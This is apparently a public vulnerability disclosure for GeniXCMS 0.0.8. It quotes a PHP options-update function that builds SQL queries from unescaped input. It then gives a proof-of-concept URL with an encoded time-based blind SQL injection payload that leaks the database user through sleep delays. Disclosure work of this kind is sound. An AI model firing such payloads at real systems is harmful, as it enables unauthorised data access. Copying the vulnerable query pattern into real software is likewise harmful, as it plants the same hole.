public static function update($key, $val = '')
{
    if (is_array($key)) {
        foreach ($key as $k => $v) {
            // $k and $v are interpolated directly into the query string: no escaping, no parameter binding
            $post = Db::query("UPDATE `options` SET `value`='{$v}' WHERE `name` = '{$k}' LIMIT 1");
        }
    } else {
        // same pattern for the single-key case: $key and $val land inside the quoted literals unescaped
        $post = Db::query("UPDATE `options` SET `value`='{$val}' WHERE `name` = '{$key}' LIMIT 1");
    }
    return $post;
}
POC:
first, access forgotpassword.php to get a token:
token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm
then access:
http://127.0.0.1/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27a
We'll find that the page sleeps 2 seconds (because my MySQL user is root), which proves the vulnerability exists.
superfish9 changed the title from "SQL Injection in Options.class.php" to "SQL Injection in Options.class.php through 0.0.8 version" on Jan 19, 2017
GeniXCMS_v0.0.8/inc/lib/Mod.class.php
continues in:
GeniXCMS_v0.0.8/inc/lib/Options.class.php